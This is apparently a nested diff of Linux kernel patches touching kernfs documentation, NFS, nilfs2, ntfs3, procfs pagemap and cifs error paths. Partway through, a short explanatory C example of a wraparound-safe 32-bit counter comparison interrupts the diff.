+ int kernfs_add_one(struct kernfs_node *kn)
+@@ -811,8 +817,9 @@ int kernfs_add_one(struct kernfs_node *kn)
+  * @name: name to look for
+  * @ns: the namespace tag to use
+  *
+- * Look for kernfs_node with name @name under @parent.  Returns pointer to
+- * the found kernfs_node on success, %NULL on failure.
++ * Look for kernfs_node with name @name under @parent.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ static struct kernfs_node *kernfs_find_ns(struct kernfs_node *parent,
+ 					  const unsigned char *name,
+@@ -885,8 +892,9 @@ static struct kernfs_node *kernfs_walk_ns(struct kernfs_node *parent,
+  * @ns: the namespace tag to use
+  *
+  * Look for kernfs_node with name @name under @parent and get a reference
+- * if found.  This function may sleep and returns pointer to the found
+- * kernfs_node on success, %NULL on failure.
++ * if found.  This function may sleep.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_find_and_get_ns(struct kernfs_node *parent,
+ 					   const char *name, const void *ns)
+@@ -910,8 +918,9 @@ EXPORT_SYMBOL_GPL(kernfs_find_and_get_ns);
+  * @ns: the namespace tag to use
+  *
+  * Look for kernfs_node with path @path under @parent and get a reference
+- * if found.  This function may sleep and returns pointer to the found
+- * kernfs_node on success, %NULL on failure.
++ * if found.  This function may sleep.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_walk_and_get_ns(struct kernfs_node *parent,
+ 					   const char *path, const void *ns)
+@@ -933,7 +942,7 @@ struct kernfs_node *kernfs_walk_and_get_ns(struct kernfs_node *parent,
+  * @flags: KERNFS_ROOT_* flags
+  * @priv: opaque data associated with the new directory
+  *
+- * Returns the root of the new hierarchy on success, ERR_PTR() value on
++ * Return: the root of the new hierarchy on success, ERR_PTR() value on
+  * failure.
+  */
+ struct kernfs_root *kernfs_create_root(struct kernfs_syscall_ops *scops,
+@@ -1005,6 +1014,8 @@ void kernfs_destroy_root(struct kernfs_root *root)
+ /**
+  * kernfs_root_to_node - return the kernfs_node associated with a kernfs_root
+  * @root: root to use to lookup
++ *
++ * Return: @root's kernfs_node
+  */
+ struct kernfs_node *kernfs_root_to_node(struct kernfs_root *root)
+ {
+@@ -1021,7 +1032,7 @@ struct kernfs_node *kernfs_root_to_node(struct kernfs_root *root)
+  * @priv: opaque data associated with the new directory
+  * @ns: optional namespace tag of the directory
+  *
+- * Returns the created node on success, ERR_PTR() value on failure.
++ * Return: the created node on success, ERR_PTR() value on failure.
+  */
+ struct kernfs_node *kernfs_create_dir_ns(struct kernfs_node *parent,
+ 					 const char *name, umode_t mode,
+@@ -1055,7 +1066,7 @@ struct kernfs_node *kernfs_create_dir_ns(struct kernfs_node *parent,
+  * @parent: parent in which to create a new directory
+  * @name: name of the new directory
+  *
+- * Returns the created node on success, ERR_PTR() value on failure.
++ * Return: the created node on success, ERR_PTR() value on failure.
+  */
+ struct kernfs_node *kernfs_create_empty_dir(struct kernfs_node *parent,
+ 					    const char *name)
+@@ -1304,6 +1315,8 @@ static struct kernfs_node *kernfs_leftmost_descendant(struct kernfs_node *pos)
+  * Find the next descendant to visit for post-order traversal of @root's
+  * descendants.  @root is included in the iteration and the last node to be
+  * visited.
++ *
++ * Return: the next descendant to visit or %NULL when done.
+  */
+ static struct kernfs_node *kernfs_next_descendant_post(struct kernfs_node *pos,
+ 						       struct kernfs_node *root)
+@@ -1567,6 +1580,8 @@ void kernfs_unbreak_active_protection(struct kernfs_node *kn)
+  * the whole kernfs_ops which won the arbitration.  This can be used to
+  * guarantee, for example, all concurrent writes to a "delete" file to
+  * finish only after the whole operation is complete.
++ *
++ * Return: %true if @kn is removed by this call, otherwise %false.
+  */
+ bool kernfs_remove_self(struct kernfs_node *kn)
+ {
+@@ -1627,7 +1642,8 @@ bool kernfs_remove_self(struct kernfs_node *kn)
+  * @ns: namespace tag of the kernfs_node to remove
+  *
+  * Look for the kernfs_node with @name and @ns under @parent and remove it.
+- * Returns 0 on success, -ENOENT if such entry doesn't exist.
++ *
++ * Return: %0 on success, -ENOENT if such entry doesn't exist.
+  */
+ int kernfs_remove_by_name_ns(struct kernfs_node *parent, const char *name,
+ 			     const void *ns)
+@@ -1665,6 +1681,8 @@ int kernfs_remove_by_name_ns(struct kernfs_node *parent, const char *name,
+  * @new_parent: new parent to put @sd under
+  * @new_name: new name
+  * @new_ns: new namespace tag
++ *
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_rename_ns(struct kernfs_node *kn, struct kernfs_node *new_parent,
+ 		     const char *new_name, const void *new_ns)
+diff --git a/fs/kernfs/file.c b/fs/kernfs/file.c
+index 9ab6c92e02dab..e4a50e4ff0d23 100644
+--- a/fs/kernfs/file.c
++++ b/fs/kernfs/file.c
+@@ -33,7 +33,7 @@ struct kernfs_open_node {
+  * pending queue is implemented as a singly linked list of kernfs_nodes.
+  * The list is terminated with the self pointer so that whether a
+  * kernfs_node is on the list or not can be determined by testing the next
+- * pointer for NULL.
++ * pointer for %NULL.
+  */
+ #define KERNFS_NOTIFY_EOL			((void *)&kernfs_notify_list)
+ 
+@@ -59,8 +59,10 @@ static inline struct mutex *kernfs_open_file_mutex_lock(struct kernfs_node *kn)
+ }
+ 
+ /**
+- * of_on - Return the kernfs_open_node of the specified kernfs_open_file
+- * @of: taret kernfs_open_file
++ * of_on - Get the kernfs_open_node of the specified kernfs_open_file
++ * @of: target kernfs_open_file
++ *
++ * Return: the kernfs_open_node of the kernfs_open_file
+  */
+ static struct kernfs_open_node *of_on(struct kernfs_open_file *of)
+ {
+@@ -82,6 +84,8 @@ static struct kernfs_open_node *of_on(struct kernfs_open_file *of)
+  * outside RCU read-side critical section.
+  *
+  * The caller needs to make sure that kernfs_open_file_mutex is held.
++ *
++ * Return: @kn->attr.open when kernfs_open_file_mutex is held.
+  */
+ static struct kernfs_open_node *
+ kernfs_deref_open_node_locked(struct kernfs_node *kn)
+@@ -548,11 +552,11 @@ static int kernfs_fop_mmap(struct file *file, struct vm_area_struct *vma)
+  *	If @kn->attr.open exists, increment its reference count; otherwise,
+  *	create one.  @of is chained to the files list.
+  *
+- *	LOCKING:
++ *	Locking:
+  *	Kernel thread context (may sleep).
+  *
+- *	RETURNS:
+- *	0 on success, -errno on failure.
++ *	Return:
++ *	%0 on success, -errno on failure.
+  */
+ static int kernfs_get_open_node(struct kernfs_node *kn,
+ 				struct kernfs_open_file *of)
+@@ -1024,7 +1028,7 @@ const struct file_operations kernfs_file_fops = {
+  * @ns: optional namespace tag of the file
+  * @key: lockdep key for the file's active_ref, %NULL to disable lockdep
+  *
+- * Returns the created node on success, ERR_PTR() value on error.
++ * Return: the created node on success, ERR_PTR() value on error.
+  */
+ struct kernfs_node *__kernfs_create_file(struct kernfs_node *parent,
+ 					 const char *name,
+diff --git a/fs/kernfs/inode.c b/fs/kernfs/inode.c
+index 3d783d80f5daa..076ba9884916c 100644
+--- a/fs/kernfs/inode.c
++++ b/fs/kernfs/inode.c
+@@ -94,7 +94,7 @@ int __kernfs_setattr(struct kernfs_node *kn, const struct iattr *iattr)
+  * @kn: target node
+  * @iattr: iattr to set
+  *
+- * Returns 0 on success, -errno on failure.
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_setattr(struct kernfs_node *kn, const struct iattr *iattr)
+ {
+@@ -241,11 +241,11 @@ static void kernfs_init_inode(struct kernfs_node *kn, struct inode *inode)
+  *	allocated and basics are initialized.  New inode is returned
+  *	locked.
+  *
+- *	LOCKING:
++ *	Locking:
+  *	Kernel thread context (may sleep).
+  *
+- *	RETURNS:
+- *	Pointer to allocated inode on success, NULL on failure.
++ *	Return:
++ *	Pointer to allocated inode on success, %NULL on failure.
+  */
+ struct inode *kernfs_get_inode(struct super_block *sb, struct kernfs_node *kn)
+ {
+diff --git a/fs/kernfs/kernfs-internal.h b/fs/kernfs/kernfs-internal.h
+index fc5821effd97d..9046d9f39e635 100644
+--- a/fs/kernfs/kernfs-internal.h
++++ b/fs/kernfs/kernfs-internal.h
+@@ -58,7 +58,7 @@ struct kernfs_root {
+  * kernfs_root - find out the kernfs_root a kernfs_node belongs to
+  * @kn: kernfs_node of interest
+  *
+- * Return the kernfs_root @kn belongs to.
++ * Return: the kernfs_root @kn belongs to.
+  */
+ static inline struct kernfs_root *kernfs_root(struct kernfs_node *kn)
+ {
+diff --git a/fs/kernfs/mount.c b/fs/kernfs/mount.c
+index d0859f72d2d64..e08e8d9998070 100644
+--- a/fs/kernfs/mount.c
++++ b/fs/kernfs/mount.c
+@@ -153,7 +153,7 @@ static const struct export_operations kernfs_export_ops = {
+  * kernfs_root_from_sb - determine kernfs_root associated with a super_block
+  * @sb: the super_block in question
+  *
+- * Return the kernfs_root associated with @sb.  If @sb is not a kernfs one,
++ * Return: the kernfs_root associated with @sb.  If @sb is not a kernfs one,
+  * %NULL is returned.
+  */
+ struct kernfs_root *kernfs_root_from_sb(struct super_block *sb)
+@@ -167,7 +167,7 @@ struct kernfs_root *kernfs_root_from_sb(struct super_block *sb)
+  * find the next ancestor in the path down to @child, where @parent was the
+  * ancestor whose descendant we want to find.
+  *
+- * Say the path is /a/b/c/d.  @child is d, @parent is NULL.  We return the root
++ * Say the path is /a/b/c/d.  @child is d, @parent is %NULL.  We return the root
+  * node.  If @parent is b, then we return the node for c.
+  * Passing in d as @parent is not ok.
+  */
+@@ -192,6 +192,8 @@ static struct kernfs_node *find_next_ancestor(struct kernfs_node *child,
+  * kernfs_node_dentry - get a dentry for the given kernfs_node
+  * @kn: kernfs_node for which a dentry is needed
+  * @sb: the kernfs super_block
++ *
++ * Return: the dentry pointer
+  */
+ struct dentry *kernfs_node_dentry(struct kernfs_node *kn,
+ 				  struct super_block *sb)
+@@ -296,7 +298,7 @@ static int kernfs_set_super(struct super_block *sb, struct fs_context *fc)
+  * kernfs_super_ns - determine the namespace tag of a kernfs super_block
+  * @sb: super_block of interest
+  *
+- * Return the namespace tag associated with kernfs super_block @sb.
++ * Return: the namespace tag associated with kernfs super_block @sb.
+  */
+ const void *kernfs_super_ns(struct super_block *sb)
+ {
+@@ -313,6 +315,8 @@ const void *kernfs_super_ns(struct super_block *sb)
+  * implementation, which should set the specified ->@fs_type and ->@flags, and
+  * specify the hierarchy and namespace tag to mount via ->@root and ->@ns,
+  * respectively.
++ *
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_get_tree(struct fs_context *fc)
+ {
+diff --git a/fs/kernfs/symlink.c b/fs/kernfs/symlink.c
+index 0ab13824822f7..45371a70caa71 100644
+--- a/fs/kernfs/symlink.c
++++ b/fs/kernfs/symlink.c
+@@ -19,7 +19,7 @@
+  * @name: name of the symlink
+  * @target: target node for the symlink to point to
+  *
+- * Returns the created node on success, ERR_PTR() value on error.
++ * Return: the created node on success, ERR_PTR() value on error.
+  * Ownership of the link matches ownership of the target.
+  */
+ struct kernfs_node *kernfs_create_link(struct kernfs_node *parent,
+diff --git a/fs/nfs/nfs4client.c b/fs/nfs/nfs4client.c
+index 84b345efcec00..02caeec2c1739 100644
+--- a/fs/nfs/nfs4client.c
++++ b/fs/nfs/nfs4client.c
+@@ -230,9 +230,8 @@ struct nfs_client *nfs4_alloc_client(const struct nfs_client_initdata *cl_init)
+ 		__set_bit(NFS_CS_INFINITE_SLOTS, &clp->cl_flags);
+ 	__set_bit(NFS_CS_DISCRTRY, &clp->cl_flags);
+ 	__set_bit(NFS_CS_NO_RETRANS_TIMEOUT, &clp->cl_flags);
+-
+-	if (test_bit(NFS_CS_DS, &cl_init->init_flags))
+-		__set_bit(NFS_CS_DS, &clp->cl_flags);
++	if (test_bit(NFS_CS_PNFS, &cl_init->init_flags))
++		__set_bit(NFS_CS_PNFS, &clp->cl_flags);
+ 	/*
+ 	 * Set up the connection to the server before we add add to the
+ 	 * global list.
+@@ -997,7 +996,6 @@ struct nfs_client *nfs4_set_ds_client(struct nfs_server *mds_srv,
+ 	if (mds_srv->flags & NFS_MOUNT_NORESVPORT)
+ 		__set_bit(NFS_CS_NORESVPORT, &cl_init.init_flags);
+ 
+-	__set_bit(NFS_CS_DS, &cl_init.init_flags);
+ 	__set_bit(NFS_CS_PNFS, &cl_init.init_flags);
+ 	cl_init.max_connect = NFS_MAX_TRANSPORTS;
+ 	/*
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index cc620fc7aaf7b..467e9439ededb 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -8821,7 +8821,7 @@ nfs4_run_exchange_id(struct nfs_client *clp, const struct cred *cred,
+ #ifdef CONFIG_NFS_V4_1_MIGRATION
+ 	calldata->args.flags |= EXCHGID4_FLAG_SUPP_MOVED_MIGR;
+ #endif
+-	if (test_bit(NFS_CS_DS, &clp->cl_flags))
++	if (test_bit(NFS_CS_PNFS, &clp->cl_flags))
+ 		calldata->args.flags |= EXCHGID4_FLAG_USE_PNFS_DS;
+ 	msg.rpc_argp = &calldata->args;
+ 	msg.rpc_resp = &calldata->res;
+diff --git a/fs/nilfs2/btnode.c b/fs/nilfs2/btnode.c
+index ee2cde07264bb..19ed9015bd660 100644
+--- a/fs/nilfs2/btnode.c
++++ b/fs/nilfs2/btnode.c
+@@ -51,12 +51,21 @@ nilfs_btnode_create_block(struct address_space *btnc, __u64 blocknr)
+ 
+ 	bh = nilfs_grab_buffer(inode, btnc, blocknr, BIT(BH_NILFS_Node));
+ 	if (unlikely(!bh))
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (unlikely(buffer_mapped(bh) || buffer_uptodate(bh) ||
+ 		     buffer_dirty(bh))) {
+-		brelse(bh);
+-		BUG();
++		/*
++		 * The block buffer at the specified new address was already
++		 * in use.  This can happen if it is a virtual block number
++		 * and has been reallocated due to corruption of the bitmap
++		 * used to manage its allocation state (if not, the buffer
++		 * clearing of an abandoned b-tree node is missing somewhere).
++		 */
++		nilfs_error(inode->i_sb,
++			    "state inconsistency probably due to duplicate use of b-tree node block address %llu (ino=%lu)",
++			    (unsigned long long)blocknr, inode->i_ino);
++		goto failed;
+ 	}
+ 	memset(bh->b_data, 0, i_blocksize(inode));
+ 	bh->b_bdev = inode->i_sb->s_bdev;
+@@ -67,6 +76,12 @@ nilfs_btnode_create_block(struct address_space *btnc, __u64 blocknr)
+ 	unlock_page(bh->b_page);
+ 	put_page(bh->b_page);
+ 	return bh;
++
++failed:
++	unlock_page(bh->b_page);
++	put_page(bh->b_page);
++	brelse(bh);
++	return ERR_PTR(-EIO);
+ }
+ 
+ int nilfs_btnode_submit_block(struct address_space *btnc, __u64 blocknr,
+@@ -217,8 +232,8 @@ int nilfs_btnode_prepare_change_key(struct address_space *btnc,
+ 	}
+ 
+ 	nbh = nilfs_btnode_create_block(btnc, newkey);
+-	if (!nbh)
+-		return -ENOMEM;
++	if (IS_ERR(nbh))
++		return PTR_ERR(nbh);
+ 
+ 	BUG_ON(nbh == obh);
+ 	ctxt->newbh = nbh;
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index 146640f0607a3..bd24a33fc72e1 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -63,8 +63,8 @@ static int nilfs_btree_get_new_block(const struct nilfs_bmap *btree,
+ 	struct buffer_head *bh;
+ 
+ 	bh = nilfs_btnode_create_block(btnc, ptr);
+-	if (!bh)
+-		return -ENOMEM;
++	if (IS_ERR(bh))
++		return PTR_ERR(bh);
+ 
+ 	set_buffer_nilfs_volatile(bh);
+ 	*bhp = bh;
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 04943ab40a011..5110c50be2918 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -136,7 +136,7 @@ static void nilfs_dispose_list(struct the_nilfs *, struct list_head *, int);
+ 
+ #define nilfs_cnt32_ge(a, b)   \
+ 	(typecheck(__u32, a) && typecheck(__u32, b) && \
+-	 ((__s32)(a) - (__s32)(b) >= 0))
++	 ((__s32)((a) - (b)) >= 0))
+ 
+ static int nilfs_prepare_segment_lock(struct super_block *sb,
+ 				      struct nilfs_transaction_info *ti)
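The one-character move in the macro above is the classic serial-number comparison fix: subtract in unsigned arithmetic and cast only the result to signed. A standalone model (not part of the patch):

#include <stdint.h>
#include <stdio.h>

/*
 * For 32-bit sequence numbers that wrap, (int32_t)(a - b) >= 0 stays
 * correct across the wrap point, while (int32_t)a - (int32_t)b can
 * overflow, which is undefined behavior in standard C.
 */
static int cnt32_ge(uint32_t a, uint32_t b)
{
	return (int32_t)(a - b) >= 0;
}

int main(void)
{
	/* b has just wrapped past a: b is logically newer by 1 */
	uint32_t a = 0x7fffffffu, b = 0x80000000u;

	printf("%d\n", cnt32_ge(a, b)); /* 0: correct, a is older */
	/* the old form would compute INT32_MAX - INT32_MIN: signed overflow */
	return 0;
}
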
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 2618bf5a37892..0388e6b42100f 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -242,7 +242,7 @@ int attr_make_nonresident(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	struct ntfs_sb_info *sbi;
+ 	struct ATTRIB *attr_s;
+ 	struct MFT_REC *rec;
+-	u32 used, asize, rsize, aoff, align;
++	u32 used, asize, rsize, aoff;
+ 	bool is_data;
+ 	CLST len, alen;
+ 	char *next;
+@@ -263,10 +263,13 @@ int attr_make_nonresident(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	rsize = le32_to_cpu(attr->res.data_size);
+ 	is_data = attr->type == ATTR_DATA && !attr->name_len;
+ 
+-	align = sbi->cluster_size;
+-	if (is_attr_compressed(attr))
+-		align <<= COMPRESSION_UNIT;
+-	len = (rsize + align - 1) >> sbi->cluster_bits;
++	/* len - how many clusters required to store 'rsize' bytes */
++	if (is_attr_compressed(attr)) {
++		u8 shift = sbi->cluster_bits + NTFS_LZNT_CUNIT;
++		len = ((rsize + (1u << shift) - 1) >> shift) << NTFS_LZNT_CUNIT;
++	} else {
++		len = bytes_to_cluster(sbi, rsize);
++	}
+ 
+ 	run_init(run);
+ 
+@@ -678,7 +681,8 @@ int attr_set_size(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 			goto undo_2;
+ 		}
+ 
+-		if (!is_mft)
++		/* keep runs for $MFT::$ATTR_DATA and $MFT::$ATTR_BITMAP. */
++		if (ni->mi.rno != MFT_REC_MFT)
+ 			run_truncate_head(run, evcn + 1);
+ 
+ 		svcn = le64_to_cpu(attr->nres.svcn);
+@@ -1637,6 +1641,7 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ 
+ 	attr_b->nres.total_size = cpu_to_le64(total_size);
+ 	inode_set_bytes(&ni->vfs_inode, total_size);
++	ni->ni_flags |= NI_FLAG_UPDATE_PARENT;
+ 
+ 	mi_b->dirty = true;
+ 	mark_inode_dirty(&ni->vfs_inode);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index c055bbdfe0f7c..dfe4930ccec64 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -1356,7 +1356,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 
+ 		err = ntfs_vbo_to_lbo(sbi, &wnd->run, vbo, &lbo, &bytes);
+ 		if (err)
+-			break;
++			return err;
+ 
+ 		bh = ntfs_bread(sb, lbo >> sb->s_blocksize_bits);
+ 		if (!bh)
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index 98f57d0c702eb..dcd689ed4baae 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -326,7 +326,8 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 	 * It does additional locks/reads just to get the type of name.
+ 	 * Should we use additional mount option to enable branch below?
+ 	 */
+-	if ((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) &&
++	if (((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) ||
++	     fname->dup.ea_size) &&
+ 	    ino != ni->mi.rno) {
+ 		struct inode *inode = ntfs_iget5(sbi->sb, &e->ref, NULL);
+ 		if (!IS_ERR_OR_NULL(inode)) {
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index 14efe46df91ef..6f03de747e375 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -396,10 +396,7 @@ static int ntfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 		}
+ 
+ 		if (ni->i_valid < to) {
+-			if (!inode_trylock(inode)) {
+-				err = -EAGAIN;
+-				goto out;
+-			}
++			inode_lock(inode);
+ 			err = ntfs_extend_initialized_size(file, ni,
+ 							   ni->i_valid, to);
+ 			inode_unlock(inode);
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index d260260900241..02465ab3f398c 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1501,7 +1501,7 @@ int ni_insert_nonresident(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 
+ 	if (is_ext) {
+ 		if (flags & ATTR_FLAG_COMPRESSED)
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 		attr->nres.total_size = attr->nres.alloc_size;
+ 	}
+ 
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 6d0d9b1c3b2e7..8e23bd6cd0f2f 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2999,7 +2999,7 @@ static struct ATTRIB *attr_create_nonres_log(struct ntfs_sb_info *sbi,
+ 	if (is_ext) {
+ 		attr->name_off = SIZEOF_NONRESIDENT_EX_LE;
+ 		if (is_attr_compressed(attr))
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 
+ 		attr->nres.run_off =
+ 			cpu_to_le16(SIZEOF_NONRESIDENT_EX + name_size);
+@@ -3937,6 +3937,9 @@ int log_replay(struct ntfs_inode *ni, bool *initialized)
+ 		goto out;
+ 	}
+ 
++	log->page_mask = log->page_size - 1;
++	log->page_bits = blksize_bits(log->page_size);
++
+ 	/* If the file size has shrunk then we won't mount it. */
+ 	if (l_size < le64_to_cpu(ra2->l_size)) {
+ 		err = -EINVAL;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4c2d079b3d49b..97723a839c81a 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -475,7 +475,7 @@ static int ntfs_extend_mft(struct ntfs_sb_info *sbi)
+ 	struct ATTRIB *attr;
+ 	struct wnd_bitmap *wnd = &sbi->mft.bitmap;
+ 
+-	new_mft_total = (wnd->nbits + MFT_INCREASE_CHUNK + 127) & (CLST)~127;
++	new_mft_total = ALIGN(wnd->nbits + NTFS_MFT_INCREASE_STEP, 128);
+ 	new_mft_bytes = (u64)new_mft_total << sbi->record_bits;
+ 
+ 	/* Step 1: Resize $MFT::DATA. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 730629235ffa1..9c36e0f3468d7 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -979,7 +979,7 @@ static struct indx_node *indx_new(struct ntfs_index *indx,
+ 		hdr->used =
+ 			cpu_to_le32(eo + sizeof(struct NTFS_DE) + sizeof(u64));
+ 		de_set_vbn_le(e, *sub_vbn);
+-		hdr->flags = 1;
++		hdr->flags = NTFS_INDEX_HDR_HAS_SUBNODES;
+ 	} else {
+ 		e->size = cpu_to_le16(sizeof(struct NTFS_DE));
+ 		hdr->used = cpu_to_le32(eo + sizeof(struct NTFS_DE));
+@@ -1677,7 +1677,7 @@ static int indx_insert_into_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	e->size = cpu_to_le16(sizeof(struct NTFS_DE) + sizeof(u64));
+ 	e->flags = NTFS_IE_HAS_SUBNODES | NTFS_IE_LAST;
+ 
+-	hdr->flags = 1;
++	hdr->flags = NTFS_INDEX_HDR_HAS_SUBNODES;
+ 	hdr->used = hdr->total =
+ 		cpu_to_le32(new_root_size - offsetof(struct INDEX_ROOT, ihdr));
+ 
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 2c8c32d9fcaa1..28cbae3954315 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -1459,7 +1459,7 @@ struct inode *ntfs_create_inode(struct user_namespace *mnt_userns,
+ 			attr->size = cpu_to_le32(SIZEOF_NONRESIDENT_EX + 8);
+ 			attr->name_off = SIZEOF_NONRESIDENT_EX_LE;
+ 			attr->flags = ATTR_FLAG_COMPRESSED;
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 			asize = SIZEOF_NONRESIDENT_EX + 8;
+ 		} else {
+ 			attr->size = cpu_to_le32(SIZEOF_NONRESIDENT + 8);
+@@ -1967,5 +1967,6 @@ const struct address_space_operations ntfs_aops = {
+ const struct address_space_operations ntfs_aops_cmpr = {
+ 	.read_folio	= ntfs_read_folio,
+ 	.readahead	= ntfs_readahead,
++	.dirty_folio	= block_dirty_folio,
+ };
+ // clang-format on
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 324c0b036fdc1..625f2b52bd586 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -82,10 +82,6 @@ typedef u32 CLST;
+ #define RESIDENT_LCN   ((CLST)-2)
+ #define COMPRESSED_LCN ((CLST)-3)
+ 
+-#define COMPRESSION_UNIT     4
+-#define COMPRESS_MAX_CLUSTER 0x1000
+-#define MFT_INCREASE_CHUNK   1024
+-
+ enum RECORD_NUM {
+ 	MFT_REC_MFT		= 0,
+ 	MFT_REC_MIRR		= 1,
+@@ -690,14 +686,15 @@ static inline bool de_has_vcn_ex(const struct NTFS_DE *e)
+ 	      offsetof(struct ATTR_FILE_NAME, name) + \
+ 	      NTFS_NAME_LEN * sizeof(short), 8)
+ 
++#define NTFS_INDEX_HDR_HAS_SUBNODES cpu_to_le32(1)
++
+ struct INDEX_HDR {
+ 	__le32 de_off;	// 0x00: The offset from the start of this structure
+ 			// to the first NTFS_DE.
+ 	__le32 used;	// 0x04: The size of this structure plus all
+ 			// entries (quad-word aligned).
+ 	__le32 total;	// 0x08: The allocated size of for this structure plus all entries.
+-	u8 flags;	// 0x0C: 0x00 = Small directory, 0x01 = Large directory.
+-	u8 res[3];
++	__le32 flags;	// 0x0C: 0x00 = Small directory, 0x01 = Large directory.
+ 
+ 	//
+ 	// de_off + used <= total
+@@ -744,7 +741,7 @@ static inline struct NTFS_DE *hdr_next_de(const struct INDEX_HDR *hdr,
+ 
+ static inline bool hdr_has_subnode(const struct INDEX_HDR *hdr)
+ {
+-	return hdr->flags & 1;
++	return hdr->flags & NTFS_INDEX_HDR_HAS_SUBNODES;
+ }
+ 
+ struct INDEX_BUFFER {
+@@ -764,7 +761,7 @@ static inline bool ib_is_empty(const struct INDEX_BUFFER *ib)
+ 
+ static inline bool ib_is_leaf(const struct INDEX_BUFFER *ib)
+ {
+-	return !(ib->ihdr.flags & 1);
++	return !(ib->ihdr.flags & NTFS_INDEX_HDR_HAS_SUBNODES);
+ }
+ 
+ /* Index root structure ( 0x90 ). */
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 0f9bec29f2b70..3e65ccccdb899 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -197,6 +197,8 @@ struct ntfs_index {
+ 
+ /* Minimum MFT zone. */
+ #define NTFS_MIN_MFT_ZONE 100
++/* Step to increase the MFT. */
++#define NTFS_MFT_INCREASE_STEP 1024
+ 
+ /* Ntfs file system in-core superblock data. */
+ struct ntfs_sb_info {
+diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
+index a954305fbc31b..484886cdd272c 100644
+--- a/fs/proc/task_mmu.c
++++ b/fs/proc/task_mmu.c
+@@ -1513,6 +1513,8 @@ static int pagemap_pmd_range(pmd_t *pmdp, unsigned long addr, unsigned long end,
+ 		}
+ #endif
+ 
++		if (page && !PageAnon(page))
++			flags |= PM_FILE;
+ 		if (page && !migration && page_mapcount(page) == 1)
+ 			flags |= PM_MMAP_EXCLUSIVE;
+ 
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 78340d904c7b9..6384e1b2b2ef7 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1872,12 +1872,12 @@ init_cifs(void)
+ 					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+ 	if (!serverclose_wq) {
+ 		rc = -ENOMEM;
+-		goto out_destroy_serverclose_wq;
++		goto out_destroy_deferredclose_wq;
+ 	}
+ 
+ 	rc = cifs_init_inodecache();
+ 	if (rc)
+-		goto out_destroy_deferredclose_wq;
++		goto out_destroy_serverclose_wq;
+ 
+ 	rc = init_mids();
+ 	if (rc)
+@@ -1939,6 +1939,8 @@ init_cifs(void)
+ 	destroy_mids();
+ out_destroy_inodecache:
+ 	cifs_destroy_inodecache();
++out_destroy_serverclose_wq:
++	destroy_workqueue(serverclose_wq);
+ out_destroy_deferredclose_wq:
+ 	destroy_workqueue(deferredclose_wq);
